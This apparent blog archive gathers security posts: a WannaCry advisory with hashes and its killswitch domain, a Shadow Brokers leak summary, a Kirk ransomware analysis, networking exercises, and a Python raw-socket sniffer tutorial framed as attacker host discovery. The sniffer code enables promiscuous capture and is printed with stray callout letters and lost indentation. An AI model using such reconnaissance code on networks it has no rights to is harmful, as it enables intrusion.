Tag Archives: tech

WannaCry a Birthday Gift??

I woke up on the 12th of May, it was my birthday, and I looked on the news feed and saw a burst of articles regarding the WannaCry Ransomware that has swept across the globe.

number20of20symantec20detections20for20wannacry20may201120to2015
In the last few days, a new type of malware called Wannacrypt has done worldwide damage.  It combines the characteristics of ransomware and a worm and has hit a lot of machines around the world from different enterprises or government organizations:

https://www.theregister.co.uk/2017/05/13/wannacrypt_ransomware_worm/

While everyone’s attention related to this attack has been on the vulnerabilities in Microsoft Windows XP, please pay attention to the following:

  • The attack works on all versions of Windows if they haven’t been patched since the March patch release!
  • The malware can only exploit those vulnerabilities it first has to get on the network.  There are reports it is being spread via email phishing or malicious web sites, but these reports remain uncertain.

 

Please take the following actions immediately:

  • Make sure all systems on your network are fully patched, particularly servers.
  • As a precaution, please ask all colleagues at your location to be very careful about opening email attachments and minimise browsing the web while this attack is on-going.

 

The vulnerabilities are fixed by the below security patches from Microsoft which was released in Mar of 2017, please ensure you have patched your systems:

https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Details of the malware can be found below.  The worm scans port TCP/445 which is the windows SMB services for file sharing:

https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/

Preliminary study shows that our environment is not infected based on all hashes and domain found:

 

URL:

www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

MD5 hash:

4fef5e34143e646dbf9907c4374276f5
5bef35496fcbdbe841c82f4d1ab8b7c2
775a0631fb8229b2aa3d7621427085ad
7bf2b57f2a205768755c07f238fb32cc
7f7ccaa16fb15eb1c7399d422f8363e8
8495400f199ac77853c53b5a3f278f3e
84c82835a5d21bbcf75a61706d8ab549
86721e64ffbd69aa6944b9672bcabb6d
8dd63adb68ef053e044a5a2f46e0d2cd
b0ad5902366f860f85b892867e5b1e87
d6114ba5f10ad67a4131ab72531f02da
db349b97c37d22f5ea1d1841e3c89eb4
e372d07207b4da75b3434584cd9f3450
f529f4556a5126bba499c26d67892240

 

Per Symantec, here is a full list of the filetypes that are targeted and encrypted by WannaCry:

  • .123
  • .3dm
  • .3ds
  • .3g2
  • .3gp
  • .602
  • .7z
  • .ARC
  • .PAQ
  • .accdb
  • .aes
  • .ai
  • .asc
  • .asf
  • .asm
  • .asp
  • .avi
  • .backup
  • .bak
  • .bat
  • .bmp
  • .brd
  • .bz2
  • .cgm
  • .class
  • .cmd
  • .cpp
  • .crt
  • .cs
  • .csr
  • .csv
  • .db
  • .dbf
  • .dch
  • .der
  • .dif
  • .dip
  • .djvu
  • .doc
  • .docb
  • .docm
  • .docx
  • .dot
  • .dotm
  • .dotx
  • .dwg
  • .edb
  • .eml
  • .fla
  • .flv
  • .frm
  • .gif
  • .gpg
  • .gz
  • .hwp
  • .ibd
  • .iso
  • .jar
  • .java
  • .jpeg
  • .jpg
  • .js
  • .jsp
  • .key
  • .lay
  • .lay6
  • .ldf
  • .m3u
  • .m4u
  • .max
  • .mdb
  • .mdf
  • .mid
  • .mkv
  • .mml
  • .mov
  • .mp3
  • .mp4
  • .mpeg
  • .mpg
  • .msg
  • .myd
  • .myi
  • .nef
  • .odb
  • .odg
  • .odp
  • .ods
  • .odt
  • .onetoc2
  • .ost
  • .otg
  • .otp
  • .ots
  • .ott
  • .p12
  • .pas
  • .pdf
  • .pem
  • .pfx
  • .php
  • .pl
  • .png
  • .pot
  • .potm
  • .potx
  • .ppam
  • .pps
  • .ppsm
  • .ppsx
  • .ppt
  • .pptm
  • .pptx
  • .ps1
  • .psd
  • .pst
  • .rar
  • .raw
  • .rb
  • .rtf
  • .sch
  • .sh
  • .sldm
  • .sldx
  • .slk
  • .sln
  • .snt
  • .sql
  • .sqlite3
  • .sqlitedb
  • .stc
  • .std
  • .sti
  • .stw
  • .suo
  • .svg
  • .swf
  • .sxc
  • .sxd
  • .sxi
  • .sxm
  • .sxw
  • .tar
  • .tbk
  • .tgz
  • .tif
  • .tiff
  • .txt
  • .uop
  • .uot
  • .vb
  • .vbs
  • .vcd
  • .vdi
  • .vmdk
  • .vmx
  • .vob
  • .vsd
  • .vsdx
  • .wav
  • .wb2
  • .wk1
  • .wks
  • .wma
  • .wmv
  • .xlc
  • .xlm
  • .xls
  • .xlsb
  • .xlsm
  • .xlsx
  • .xlt
  • .xltm
  • .xltx
  • .xlw
  • .zip

As you can see, the ransomware covers nearly any important file type a user might have on his or her computer. It also installs a text file on the user’s desktop with the following ransom note:

2cry

Advertisements

Shadow Brokers Release Attack Tool Archives

On April 9 and April 14, 2017, the Shadow Brokers threat group released archives of attack tools and other information that it claims originated from the National Security Agency (NSA). The contents included exploits against Windows, Solaris, and other software from as early as 2008, as well as information about a campaign targeting EastNets, a SWIFT (Society for Worldwide Interbank Financial Telecommunication) Service Bureau.

Despite some reports that the archives contain exploits for unpatched Windows vulnerabilities, SecureWorks(R) Counter Threat Unit(TM) (CTU) researchers determined that there are no functional exploits against fully patched, supported Microsoft software. Several of the vulnerabilities were addressed in Microsoft Security Bulletin MS17-10, which was released as part of March’s patch cycle. Three other exploits target Windows XP, Vista, Server 2003, Server 2008, and IIS 6.x, but Microsoft does not plan to provide patches for these exploits as the products are no longer supported.

Two attack tools target unpatched vulnerabilities in current Solaris versions:

– EBBISLAND is a remote buffer overflow exploit against XDR code that targets any running RPC service.
– EXTREMEPAAR is a local privilege escalation exploit.

Another buffer overflow exploit named VIOLENTSPIRIT targets the ttsession daemon in Solaris 2.6-2.9. The archives also included exploits targeting less-common software such as Lotus Domino versions 6 and 7, Lotus cc:mail, RedFlag Webmail 4, Avaya Media Server, and phpBB.

According to the Shadow Brokers’ April 14 release, the PLATINUM COLONY threat group (also known as Equation Group) gained access to the EastNets network, monitored SWIFT transactions from a select number of targeted financial services institutions between March 2013 and at least October 2013, and had persistent and wide-ranging access to the EastNets network. CTU(TM) researchers assess with high confidence that PLATINUM COLONY is operated by a United States intelligence agency. The group has been active since at least 2001 and likely uses its sophisticated toolset for military espionage and national security objectives, rather than for economic espionage activities.

PowerPoint and Excel documents within the leaked files list SWIFT Alliance Access servers run by EastNets, and several of the servers are marked as compromised for data collection. There is no indication that networks and hosts operated by EastNet customers outside the EastNet environment were compromised, but SWIFT transactions in 2013 could have been monitored by an unauthorized party as they traversed EastNets servers. EastNets released a public statement saying, “The reports of an alleged hacker-compromised EastNets Service Bureau (ENSB) network is totally false and unfounded.” However, the documentation provided in the Shadow Brokers leak strongly suggests a compromise.

 

Recommended actions:

CTU researchers recommend that clients ensure that the MS17-10 security updates have been applied. In addition, clients should upgrade unsupported Windows operating systems and IIS web servers to a supported version and should restrict external access to RPC services on Solaris servers.

SecureWorks actions:

The CTU research team is investigating the feasibility of countermeasures to detect the published exploits.

Questions:

If you have any questions or concerns, please submit a ticket via the SecureWorks Client Portal.

 

References:

https://portal.secureworks.com/intel/tips/5233

https://portal.secureworks.com/intel/tips/5835

https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk

https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

http://www.eastnets.com/news_events/news/17-04-14/No_credibility_to_the_online_claim_of_a_compromise_of_EastNets_customer_information_on_its_SWIFT_service_bureau.aspx

How to Sniff a Network: Decoding the IP Layer

 

Following from previous post, which can be found at: How to Sniff a Network : Packet Sniffing on Windows and Linux and How to Sniff a Network : Raw Sockets and Sniffing.

Sniffing one packet is not overly useful, so let’s add some functionality to process more packets and decode their contents.

In its current form, our sniffer receives all of the IP headers along with any higher protocols such as TCP, UDP, or ICMP. The information is packed into binary form, and as shown above, is quite difficult to understand. We are now going to work on decoding the IP portion of a packet so that we can pull useful information out such as the protocol type (TCP, UDP, ICMP), and the source and destination IP addresses. This will be the foundation for you to start creating further protocol parsing later on. If we examine what an actual packet looks like on the network, you will have an understanding of how we need to decode the incoming packets. Refer to Figure 3-1 for the makeup of an IP header.

Figure 3-1 Typical IPv4 header structure
Figure 3-1: Typical IPv4 header structure

We will decode the entire IP header (except the Options field) and extract the protocol type, source, and destination IP address. Using the Python ctypes module to create a C-like structure will allow us to have a friendly format for handling the IP header and its member fields. First, let’s take a look at the C definition of what an IP header looks like.

struct ip {
u_char ip_hl:4;
u_char ip_v:4;
u_char ip_tos;
u_short ip_len;
u_short ip_id;
u_short ip_off;
u_char ip_ttl;
u_char ip_p;
u_short ip_sum;
u_long ip_src;
u_long ip_dst;
}

You now have an idea of how to map the C data types to the IP header values. Using C code as a reference when translating to Python objects can be useful because it makes it seamless to convert them to pure Python. Of note, the ip_hl and ip_v fields have a bit notation added to them (the :4 part). This indicates that these are bit fields, and they are 4 bits wide. We will use a pure Python solution to make sure these fields map correctly so we can avoid having to do any bit manipulation. Let’s implement our IP decoding routine into sniffer_ip_header_decode.py as shown below.

import socket


import os
import struct
from ctypes import *

# host to listen on
host = "192.168.0.187"


# our IP header
u class IP(Structure):
_fields_ = [
("ihl", c_ubyte, 4),
("version", c_ubyte, 4),
("tos", c_ubyte),
("len", c_ushort),
("id", c_ushort),
("offset", c_ushort),
("ttl", c_ubyte),
("protocol_num", c_ubyte),
("sum", c_ushort),
("src", c_ulong),
("dst", c_ulong)
]


def __new__(self, socket_buffer=None):
return self.from_buffer_copy(socket_buffer)


def __init__(self, socket_buffer=None):


# map protocol constants to their names


self.protocol_map = {1:"ICMP", 6:"TCP", 17:"UDP"}


v # human readable IP addresses


self.src_address = socket.inet_ntoa(struct.pack("<L",self.src))
self.dst_address = socket.inet_ntoa(struct.pack("<L",self.dst))


# human readable protocol
try:
self.protocol = self.protocol_map[self.protocol_num]
except:
self.protocol = str(self.protocol_num)


# this should look familiar from the previous example
if os.name == "nt":
socket_protocol = socket.IPPROTO_IP
else:
socket_protocol = socket.IPPROTO_ICMP


sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)


sniffer.bind((host, 0))
sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)


if os.name == "nt":


sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)

try:


while True:


# read in a packet
w raw_buffer = sniffer.recvfrom(65565)[0]


# create an IP header from the first 20 bytes of the buffer
x ip_header = IP(raw_buffer[0:20])


# print out the protocol that was detected and the hosts
y print "Protocol: %s %s -> %s" % (ip_header.protocol, ip_header.src_¬
address, ip_header.dst_address)


# handle CTRL-C
except KeyboardInterrupt:

# if we're using Windows, turn off promiscuous mode
if os.name == "nt":
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)

The first step is defining a Python ctypes structure u that will map the first 20 bytes of the received buffer into a friendly IP header. As you can see, all of the fields that we identified and the preceding C structure match up nicely. The __new__ method of the IP class simply takes in a raw buffer (in this case, what we receive on the network) and forms the structure from it. When the __init__ method is called, __new__ is already finished processing the buffer. Inside __init__, we are simply doing some housekeeping to give some human readable output for the protocol in use and the IP addresses v.
With our freshly minted IP structure, we now put in the logic to continually read in packets and parse their information. The first step is to read in the packet w and then pass the first 20 bytes x to initialize our IP structure. Next, we simply print out the information that we have captured y.
Let’s try it out.

Kicking the Tires

Let’s test out our previous code to see what kind of information we are extracting from the raw packets being sent. I definitely recommend that you do this test from your Windows machine, as you will be able to see TCP, UDP, and ICMP, which allows you to do some pretty neat testing (open up a browser, for example). If you are confined to Linux, then perform the previous ping test to see it in action.

Open a terminal and type:

python sniffer_ip_header_decode.py

Now, because Windows is pretty chatty, you’re likely to see output immediately.
I tested this script by opening Internet Explorer and going to www
.google.com, and here is the output from our script:

Protocol: UDP 192.168.0.190 -> 192.168.0.1
Protocol: UDP 192.168.0.1 -> 192.168.0.190
Protocol: UDP 192.168.0.190 -> 192.168.0.187
Protocol: TCP 192.168.0.187 -> 74.125.225.183
Protocol: TCP 192.168.0.187 -> 74.125.225.183
Protocol: TCP 74.125.225.183 -> 192.168.0.187
Protocol: TCP 192.168.0.187 -> 74.125.225.183

Because we aren’t doing any deep inspection on these packets, we can only guess what this stream is indicating. My guess is that the first couple of UDP packets are the DNS queries to determine where google.com lives, and the subsequent TCP sessions are my machine actually connecting and downloading content from their web server. To perform the same test on Linux, we can ping google.com, and the results will look something like this:

Protocol: ICMP 74.125.226.78 -> 192.168.0.190
Protocol: ICMP 74.125.226.78 -> 192.168.0.190
Protocol: ICMP 74.125.226.78 -> 192.168.0.190

You can already see the limitation: we are only seeing the response and only for the ICMP protocol. But because we are purposefully building a host discovery scanner, this is completely acceptable. We will now apply the same techniques we used to decode the IP header to decode the ICMP messages. Stay tuned for the next post.

How to Sniff a Network: Packet Sniffing on Windows and Linux

Network sniffers allow you to see packets entering and exiting a target machine. As a result, they have many practical uses before and after exploitation. In some cases, you’ll be able to use Wireshark (https://wireshark.org/) to monitor traffic or use a Pythonic solution like Scapy (which we’ll explore in the later posts). Nevertheless, you can read more: How to Sniff a Network : Raw Sockets and Sniffing.

 

Accessing raw sockets in Windows is slightly different than on its Linux brethren, but we want to have the flexibility to deploy the same sniffer to multiple platforms. We will create our socket object and then determine which platform we are running on. Windows requires us to set some additional flags through a socket input/output control (IOCTL),1 which enables promiscuous mode on the network interface. In our first example, we simply set up our raw socket sniffer, read in a single packet, and then quit.

import socket
import os
# host to listen on
host = "192.168.0.196"

# create a raw socket and bind it to the public interface
if os.name == "nt":
u socket_protocol = socket.IPPROTO_IP
else:
socket_protocol = socket.IPPROTO_ICMP
sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)
sniffer.bind((host, 0))

# we want the IP headers included in the capture
v sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)

# if we're using Windows, we need to send an IOCTL
# to set up promiscuous mode
w if os.name == "nt":
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)

# read in a single packet
x print sniffer.recvfrom(65565)

# if we're using Windows, turn off promiscuous mode
y if os.name == "nt":
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)

We start by constructing our socket object with the parameters necessary for sniffing packets on our network interface u. The difference between Windows and Linux is that Windows will allow us to sniff all incoming packets regardless of protocol, whereas Linux forces us to specify that we are sniffing ICMP. Note that we are using promiscuous mode, which requires administrative privileges on Windows or root on Linux. Promiscuous mode allows us to sniff all packets that the network card sees, even those not destined for your specific host. Next we set a socket option that includes the IP headers in our captured packets. The next step w is to determine if we are using Windows, and if so, we perform the additional step of sending an IOCTL to the network card driver to enable promiscuous mode. If you’re running Windows in a virtual machine, you will likely get a notification that the guest operating system is enabling promiscuous mode; you, of course, will allow it. Now we are ready to actually perform some sniffing, and in this case we are simply printing out the entire raw packet x with no packet decoding. This is just to test to make sure we have the core of our sniffing code working. After a single packet is sniffed, we again test for Windows, and disable promiscuous mode y before exiting the script.

Kicking the Tires

Open up a fresh terminal or cmd.exe shell under Windows and run the
following:

python sniffer.py

In another terminal or shell window, you can simply pick a host to ping.
Here, we’ll ping nostarch.com:

ping nostarch.com

In your first window where you executed your sniffer, you should see
some garbled output that closely resembles the following:

('E\x00\x00:\x0f\x98\x00\x00\x80\x11\xa9\x0e\xc0\xa8\x00\xbb\xc0\xa8\x0
0\x01\x04\x01\x005\x00&\xd6d\n\xde\x01\x00\x00\x01\x00\x00\x00\x00\x00\
x00\x08nostarch\x03com\x00\x00\x01\x00\x01', ('192.168.0.187', 0))

You can see that we have captured the initial ICMP ping request destined for nostarch.com (based on the appearance of the string nostarch.com).
If you are running this example on Linux, then you would receive the response from nostarch.com. Sniffing one packet is not overly useful, so let’s add some functionality to process more packets and decode their contents in the following post.

 

How to Sniff a Network : Raw Sockets and Sniffing

Network sniffers allow you to see packets entering and exiting a target machine. As a result, they have many practical uses before and after exploitation. In some cases, you’ll be able to use Wireshark (https://wireshark.org/) to monitor traffic or use a Pythonic solution like Scapy (which we’ll explore in the later posts). Nevertheless, there’s an advantage to knowing how to throw together a quick sniffer to view and decode network traffic. Writing a tool like this will also give you a deep appreciation for the mature tools that can painlessly take care of the finer points with little effort on your part. You will also likely pick up some new Python techniques and perhaps a better understanding of how the low-level networking bits work.

In the previous chapter, we covered how to send and receive data using TCP and UDP, and arguably this is how you will interact with most network services. But underneath these higher-level protocols are the fundamental building blocks of how network packets are sent and received. You will use raw sockets to access lower-level networking information such as the raw IP and ICMP headers. In our case, we are only interested in the IP layer and higher so we won’t decode any Ethernet information. Of course, if you intend to perform any low-level attacks such as ARP poisoning or you are developing wireless assessment tools, you need to become intimately familiar with Ethernet frames and their use. Let’s begin with a brief walkthrough of how to discover active hosts on a
network segment.

 

Building a UDP Host Discovery Tool

The main goal of our sniffer is to perform UDP-based host discovery on a target network. Attackers want to be able to see all of the potential targets on a network so that they can focus their reconnaissance and exploitation attempts. We’ll use a known behavior of most operating systems when handling closed UDP ports to determine if there is an active host at a particular IP address. When you send a UDP datagram to a closed port on a host, that host typically sends back an ICMP message indicating that the port is unreachable. This ICMP message indicates that there is a host alive because we’d assume that there was no host if we didn’t receive a response to the UDP datagram. It is essential that we pick a UDP port that will not likely be used, and for maximum coverage, we can probe several ports to ensure we aren’t hitting an active UDP service. Why UDP? There’s no overhead in spraying the message across an entire subnet and waiting for the ICMP responses to arrive accordingly. This is quite a simple scanner to build with most of the work going into decoding and analyzing the various network protocol headers. We will implement this host scanner for both Windows and Linux to maximize the likelihood of being able to use it inside an enterprise environment. We could also build additional logic into our scanner to kick off full Nmap port scans on any hosts we discover to determine if they have a viable network attack surface. These are exercises left for the reader, and I look forward to hearing some of the creative ways you can expand this core concept.
Let’s get started.

 

Network sniffing

Additional Resources for Week 3 RITx: CYBER501x Cybersecurity Fundamentals

Kerckhoff’s Principle

Encryption

This video explains how the RSA public key and private key are created to be fully dependent on each other. The first part of the video explains the concepts with paint and colors. The second part contains heavy duty math, which may not be as easily understood:

Heartbleed

These links detail the Heartbleed bug from 2014. This vulnerability shows that even though data is protected both in transit and at rest with encryption, data that is being processed is not protected. The encrypted data needs to be decrypted before it’s processed, and therefore is vulnerable at this stage.

 

Week 3 Additional Resources

Using tools to analyse data flow

Practical Exercise

We will look at three simple practical exercises you can do right now from your PC. These involve ARP, ping, and traceroute.

For these exercises we will stick to the Windows environment, however equivalent commands are available in Linux. Each exercise is carried out from the windows command prompt, “cmd.exe”, which can be found from the Windows start menu. Each of the functions we will use are normally part of a standard Windows installation.

ARP table

Address Resolution Protocol (ARP) is used to map a particular IP address to a MAC address, so that packets can be transmitted across a LAN. Your PC has a local ARP table that it uses to keep track of IP-MAC pairs. Let’s have a look at it.

To view your ARP table, at the command prompt type: arp -a

You should see something similar to this:

Arp Image

The table shows columns for IP address, MAC address, and whether the address is statically or dynamically allocated (using Dynamic Host Configuration Protocol (DHCP)).

What you see will depend greatly on your local network environment. In the example the PC has two network interfaces, one for its LAN (starting 10.101…), and one for a VirtualBox interface (192.168…).

In this example the LAN has around other 30 hosts. Your ARP table may have comparatively few entries if it is your home network.

Question: What are the IP addresses starting 224.0… used for? Search Google to find out about these addresses.

Ping

The ICMP protocol can be used to determine whether another machine is alive by sending it a “ping”, which is an ICMP Echo message.

The IP address 8.8.8.8 is owned by Google and it hosts one of Google’s public DNS servers. Let’s try pinging the server to see if it responds.

At the command prompt type: ping 8.8.8.8

You should see something similar to this:

Ping Image

The ping command by default sends out four ICMP Echo messages on Windows. In Linux you should add the option “-c 4” to limit the count to four packets.

In this example four ICMP Echo Reply messages were received, telling us there is a host at 8.8.8.8. We also see the time taken to get each response. Pings are also a good way to learn about network latencies.

If you do not see any responses it is likely that your network is filtering certain ICMP packets. This is common in corporate networks to mitigate abuse of ICMP by attackers!

Traceroute

The traceroute tool attempts to trace the route of an IP packet to a specified host by sending probe packets with small time-to-live (TTL) values.

Let’s use traceroute to discover each of the hops (routers) that a packet will pass through on the way to the Google DNS server at IP address 8.8.8.8.

At the command prompt type: tracert 8.8.8.8

You should see something similar to this:

Traceroute Image

In this case there are 11 hops to the host at 8.8.8.8., and we can see the IP address of each hop on the way.

Note that some of these belong to the private IPv4 address spaces. For more information see: https://en.wikipedia.org/wiki/Private_network

Depending on your network configuration you may be unable to successfully complete a traceroute. If there is a network firewall between your PC and 8.8.8.8, the firewall may well be configured to filter packets with low TTL value to prevent network reconnaissance.

A full manual for Windows is available here “tracert”

The Linux equivalent is simply called “traceroute”.

Netmask Translation Table

This is a Netmask Translation Table. It can be used to determine what IPs should be used and which ones cannot be used.

Netmask                CIDR         Notes
=====================================================================

255.255.255.255        /32          Host (single address)
255.255.255.254        /31          Unusable

255.255.255.252        /30            4 IPs with   2 Usable
255.255.255.248        /29            8 IPs with   6 Usable

255.255.255.240        /28           16 IPs with  14 Usable
255.255.255.224        /27           32 IPs with  30 Usable

255.255.255.192        /26           64 IPs with  62 Usable
255.255.255.128        /25          128 IPs with 126 Usable

255.255.255.0          /24         256 IPs with  254 Usable "Class C"

Note: The first and last IP of a series are NOT usable and the first  
usable IP is normally set up for the router.
The 1st IP is the network address. The last IP is the broadcast address.
=====================================================================

Each customer will be given their own unique IP block necessary to configure their own network. This unique IP information will be supplied by their Account Manager.

The below is only an EXAMPLE, do NOT use its IPs, instead, use those IP numbers that come from your Account Manager.

Your Account Manager should give you all the following information.

Dear Customer:

Your IP block is 205.177.54.32/28

Gateway IP address (Router IP)      205.177.54.33
Useable IP's                        205.177.54.34-46
Subnet Mask                         255.255.255.240

DNS Servers:    ns.cais.com         205.177.10.10
                ns2.cais.com        199.0.216.222



Subnetmask Translation Table

This is a Netmask Translation Table. It can be used to determine what IPs should be used and which ones cannot be used.

Subnetmask            Subnetmask (binary)                    CIDR         Notes
=================================================================================================

255.255.255.255       11111111.11111111.11111111.11111111    /32          Host (single address)

255.255.255.254       11111111.11111111.11111111.11111110    /31          Unusable
255.255.255.252       11111111.11111111.11111111.11111100    /30            4 IPs with   2 Usable
255.255.255.248       11111111.11111111.11111111.11111000    /29            8 IPs with   6 Usable
255.255.255.240       11111111.11111111.11111111.11110000    /28           16 IPs with  14 Usable
255.255.255.224       11111111.11111111.11111111.11100000    /27           32 IPs with  30 Usable
255.255.255.192       11111111.11111111.11111111.11000000    /26           64 IPs with  62 Usable
255.255.255.128       11111111.11111111.11111111.10000000    /25          128 IPs with 126 Usable
255.255.255.0         11111111.11111111.11111111.00000000    /24         256 IPs with  254 Usable 
                                                                                "Class C"

255.255.254.0         11111111.11111111.11111110.00000000    /23         
255.255.252.0         11111111.11111111.11111100.00000000    /22         
255.255.248.0         11111111.11111111.11111000.00000000    /21         
255.255.240.0         11111111.11111111.11110000.00000000    /20         
255.255.224.0         11111111.11111111.11100000.00000000    /19         
255.255.192.0         11111111.11111111.11000000.00000000    /18         
255.255.128.0         11111111.11111111.10000000.00000000    /17         
255.255.0.0           11111111.11111111.00000000.00000000    /16         
                                                                                "Class B"

255.254.0.0           11111111.11111110.00000000.00000000    /15         
255.252.0.0           11111111.11111100.00000000.00000000    /14         
255.248.0.0           11111111.11111000.00000000.00000000    /13         
255.240.0.0           11111111.11110000.00000000.00000000    /12         
255.224.0.0           11111111.11100000.00000000.00000000    /11         
255.192.0.0           11111111.11000000.00000000.00000000    /10         
255.128.0.0           11111111.10000000.00000000.00000000    /9          
255.0.0.0             11111111.00000000.00000000.00000000    /8         
                                                                                "Class A"

254.0.0.0             11111110.00000000.00000000.00000000    /7         
252.0.0.0             11111100.00000000.00000000.00000000    /6         
248.0.0.0             11111000.00000000.00000000.00000000    /5         
240.0.0.0             11110000.00000000.00000000.00000000    /4         
224.0.0.0             11100000.00000000.00000000.00000000    /3         
192.0.0.0             11000000.00000000.00000000.00000000    /2         
128.0.0.0             10000000.00000000.00000000.00000000    /1          
0.0.0.0               00000000.00000000.00000000.00000000    /0         
                                                                                IP space



Note: The first and last IP of a series are NOT usable and the first  
usable IP is normally set up for the router.
The 1st IP is the network address. The last IP is the broadcast address.
=====================================================================

Star Trek – Ransomware Brings us Monero and a Spock Decryptor!

Boldly going where no man has gone before, the Kirk Ransomware brings so much nerdy goodness to the table that it could make anyone in IT interested. We have Star Trek, Low Orbital Ion Cannons, a cryptocurrency payment other than Bitcoin, and a decryptor named Spock! Need I say more?

Discovered today by Avast malware researcher Jakub Kroustek, the Kirk Ransomware is written in Python and may be the first ransomware to utilize Monero as the ransom payment of choice.

Kirk Ransomware

At this time there are no known victims of this ransomware and it does not appear to be decryptable.  For those who want to discuss this ransomware or receive updates about it, they can subscribe to our Kirk Ransomware Support & Help topic.

Kirk Ransomware uses Monero for Ransom Payments

Ever since Monero was released, it has been highly touted as a more secure and anonymous payment system than Bitcoin. This has caused  underground criminal sites, like AlphaBay, to accept it as payment and for criminals to mine it using mining Trojans. It was only a matter of time until ransomware developers started requesting it.

For possibly the first time, with the release of Kirk Ransomware, Monero has been introduced as a ransom payment. The problem is that this is only going to confuse victims even more. Even with Bitcoin becoming more accepted, it is still not easy to acquire them. By introducing a new cryptocurrency into the mix, victims are just going to become more confused and make paying ransoms even more difficult.

How the Kirk Ransomware Encrypts a Computer

While it is not currently known how the Kirk Ransomware is being distributed, we do know that it is masquerading as the network stress tool called Low Orbital Ion Cannon.  Currently named loic_win32.exe, when executed Kirk Ransomware will now generate a AES password that will be used to encrypt a victim’s files. This AES key will then be encrypted by an embedded RSA-4096 public encryption key and saved in the file called pwd in the same directory as the ransomware executable.

If you plan on paying the ransom for the Kirk Ransomware, you must not delete the pwd file as it contains an encrypted version of your decryption key. Only the ransomware developer can decrypt this file and if a victim wishes to pay the ransom they will be required to send them this file.

Below is the current embedded RSA key used to encrypt the victim’s encryption key.

-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAoQpUk7lhDoenoPTCLRjGLStBjoT9owWl3HuYezrpmDt60t0P4/jlrwDC06POYxGpDDUbC2SfhcvbemFXWmX/zCM92h94v6sxfc6GOfKLbdwudSMOJ+TOSd7XGa3okcIbAh7bVR28XPBOGcg203Z/7YJh+wHHnjGjOxcUZIcM3X2BPDIEuc1jxgWgDEIMmjb+yi6m3YdtAmwmurV8wb61jXrBY936IVxYc3sxw94x9GjfsIspmdurV5En1DEkXPORp7IU5q6Zj4ZZsLwyT+xX5V5MdWVYhOJV4X8pLPHUPjvAHQX1POGnX/DVlieG//RXOi0mnR+Vh4OjvBsXC10VqrQgZZXByHOtjrdfXgZH8Izr+KuyTVRGILvj884EZ1DMI6L4sb4F9EUjcRacO/tURdduUTw3Q5qsbLPQiS/V4MBEQswlH7UVMiWxfNymyvM5I3BfFeW2QwauRGH5xmaDsQG0Yy/AsPzvHKqoShP/LepO1bYUdUodvnfVbChPGTYzZrwmnixS/m5AxyhUh/Ex3cxZ5raJWnBfx72wsviuAPIrXqyzlTlNo6aPX029Oh52ezk4uYwLpN02IjJ6yUEgyFkqbhASCtvYjqAprvCheane2j7+U7RnjZ+jLNgMWSc5M1pdGK4YYT+U3yfWqbdGRSie6e+LhifKADqjHeXSAVsCAwEAAQ==
-----END PUBLIC KEY-----

Kirk Ransomware will now display a message box that displays the same slogan as the LOIC network stress tool. This slogan is: “Low Orbital Ion Cannon | When harpoons, air strikes and nukes fail | v1.0.1.0”.

Fake Low Orbital Ion Cannon Alert
Fake Low Orbital Ion Cannon Alert

At this point, the ransomware infection will begin to scan the C: drive for files that have certain file extensions. At the time of this writing, Kirk Ransomware targets 625 file types, which are listed at the end of the article.

If a matching file is detected, it will encrypt it using the previously created AES encryption key and then append the .kirked extension to the encrypted file’s name. For example, a file called test.jpg would be encrypted and renamed to test.jpg.kirked.

When the ransomware finishes encrypting the files it will drop a ransom note called RANSOM_NOTE.txt in the same folder as the executable. It will also display the ransom note in a Window on your desktop. A full version of the ransom note can be see at the end of the article.

This ransom note tells the victim that they must purchase ~1,100 worth of the Monero currency and send it to the enclosed Monero address. Once a payment is made, the victim must email the pwd file and the payment transaction ID to the kirk.help@scryptmail.com or kirk.payments@scryptmail.com email addresses to receive the decryptor.

The Spock Decryptor

This wouldn’t be a Star Trek themed ransomware without Spock. The developer agrees as they have named the decryptor “Spock” and it will be supplied to the victim once a a payment is made.

The Spock Decryptor

At this time we have not seen a sample of the decryptor, so cannot provide more info regarding it.

As previously said, unfortunately at this time the ransomware does not look like it can be decrypted.  For those who want to discuss this ransomware or receive updates about it, they can subscribe to our Kirk Ransomware Support & Help topic.

 

IOCS:

Files associated with the Kirk Ransomware:

loic_win32.exe
pwd
RANSOM_NOTE.txt

Hashes:

SHA256: 39a2201a88f10d81b220c973737f0becedab2e73426ab9923880fb0fb990c5cc

Targeted File Extensions:

